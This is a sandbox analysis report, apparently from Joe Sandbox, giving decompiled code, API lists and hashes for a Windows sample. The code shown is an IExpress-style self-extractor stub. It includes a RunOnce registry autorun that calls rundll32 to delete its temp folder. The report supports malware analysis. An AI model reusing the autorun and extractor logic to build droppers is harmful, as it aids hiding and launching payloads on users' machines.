                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0xa488c0; // 0x1491181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0xa488c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0xa488c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A44236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A4424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A44263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A4427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,00A488C0,?,00000001), ref: 00A4429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A488C0,01491181,?,00000001), ref: 00A442C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A488C0,00000000,?,00000001), ref: 00A442D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A44391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A443A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 8c750b8000dc8dba626b6a717ed003ff40b4564e42f7aa327f63fe838ebb37bd
                                                                                                                                                                                                                                            • Instruction ID: 961d72bb1aa91893095dade8bc53a5966426eff861642e5faa87fe680fc5dbba
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c750b8000dc8dba626b6a717ed003ff40b4564e42f7aa327f63fe838ebb37bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D741187CA40204EFD711EFB4EC94BAE7BB4EBCA784F140569E941A7251CBB98D02C761
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A42773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E00A41781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E00A4658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E00A4658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0xa41140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E00A41680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            0x00a42803
                                                                                                                                                                                                                                            0x00a4280b
                                                                                                                                                                                                                                            0x00a42831
                                                                                                                                                                                                                                            0x00a428c3
                                                                                                                                                                                                                                            0x00a428c9
                                                                                                                                                                                                                                            0x00a428cd
                                                                                                                                                                                                                                            0x00a42837
                                                                                                                                                                                                                                            0x00a4285a
                                                                                                                                                                                                                                            0x00a4285c
                                                                                                                                                                                                                                            0x00a42865
                                                                                                                                                                                                                                            0x00a42892
                                                                                                                                                                                                                                            0x00a42895
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42867
                                                                                                                                                                                                                                            0x00a42878
                                                                                                                                                                                                                                            0x00a4288c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4287a
                                                                                                                                                                                                                                            0x00a42880
                                                                                                                                                                                                                                            0x00a42885
                                                                                                                                                                                                                                            0x00a42897
                                                                                                                                                                                                                                            0x00a42899
                                                                                                                                                                                                                                            0x00a42899
                                                                                                                                                                                                                                            0x00a42878
                                                                                                                                                                                                                                            0x00a42865
                                                                                                                                                                                                                                            0x00a428a0
                                                                                                                                                                                                                                            0x00a428bf
                                                                                                                                                                                                                                            0x00a428c1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a428c1
                                                                                                                                                                                                                                            0x00a42831
                                                                                                                                                                                                                                            0x00a427dd
                                                                                                                                                                                                                                            0x00a427d5
                                                                                                                                                                                                                                            0x00a428e5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(173B1603,00000000,00000000,00000000), ref: 00A427A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 00A427B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A427BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A41140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A428A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A428AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A428B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A427E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: 48797b4fc39e517b4448839076e9c5febf20ae91408de87f06ff830d334149f7
                                                                                                                                                                                                                                            • Instruction ID: 6a45c44c9e2e197125aaa7b2deaff82f0fb53205bdabdd1483a97b52a5b81b67
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48797b4fc39e517b4448839076e9c5febf20ae91408de87f06ff830d334149f7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF41A379A4012CAFDB249B649C85BEE7BBDEFE6700F4040A9F545D2101DB708E868FA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E00A42267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0xa48530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E00A4658A( &_v268, 0x104, 0xa41140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            							E00A4171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A422A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00A422D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A422F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A42305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A4236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A4237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A42321
                                                                                                                                                                                                                                            • wextract_cleanup0, xrefs: 00A4227C, 00A422CD, 00A42363
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A4232D
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A42299
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 3027380567-2554356261
                                                                                                                                                                                                                                            • Opcode ID: 4197858169e1d90df518fa0c8b235417d1c4a09d50e0b44feb79c18e8e8e083a
                                                                                                                                                                                                                                            • Instruction ID: 9cce8295ac158c9ae66849c5056c53d267e63c9ef53432beafa04d42e05ec581
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4197858169e1d90df518fa0c8b235417d1c4a09d50e0b44feb79c18e8e8e083a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA31B47DA002186BDB21DB50EC49FEA7B7CEFD5700F0001A9B50DAA051EA75AF89CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E00A43100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0xa48590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0xa48590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E00A443D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0xa48d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0xa488b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E00A430C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A4313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A4314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 00A4316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00A43176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A4317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00A43185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00A43190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00A430C0), ref: 00A431A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A431CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 3785188418-3940384054
                                                                                                                                                                                                                                            • Opcode ID: df6ab5ab2d0ec44550471ea157e775b0eb8846aa3117bb971d27f8296e6e3ae4
                                                                                                                                                                                                                                            • Instruction ID: 2d60eeafe91895f2ca478d0b526ac92349be5cd19941b97d537b4ba4b8b3e764
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df6ab5ab2d0ec44550471ea157e775b0eb8846aa3117bb971d27f8296e6e3ae4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E11B43E284251BBEF11DFACAC0CB9A3A64FBDB721F100711F915911E0DBB69642D742
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A4468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE$cent
                                                                                                                                                                                                                                            • API String ID: 3370778649-3553536280
                                                                                                                                                                                                                                            • Opcode ID: 326f2d5505f4f8c7cd3dcdff1f4d3bddc5266149f9e37d79bc68a212fe6d873e
                                                                                                                                                                                                                                            • Instruction ID: 0268963f2338d3acc74a65a880b2f5cf957b04f3529f2de7741dc48607788b05
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 326f2d5505f4f8c7cd3dcdff1f4d3bddc5266149f9e37d79bc68a212fe6d873e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C501A93E2842107BE3205BE56C4DF6B7E2CDBDFF51F050414FA4997150C9B2884287B6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E00A417EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
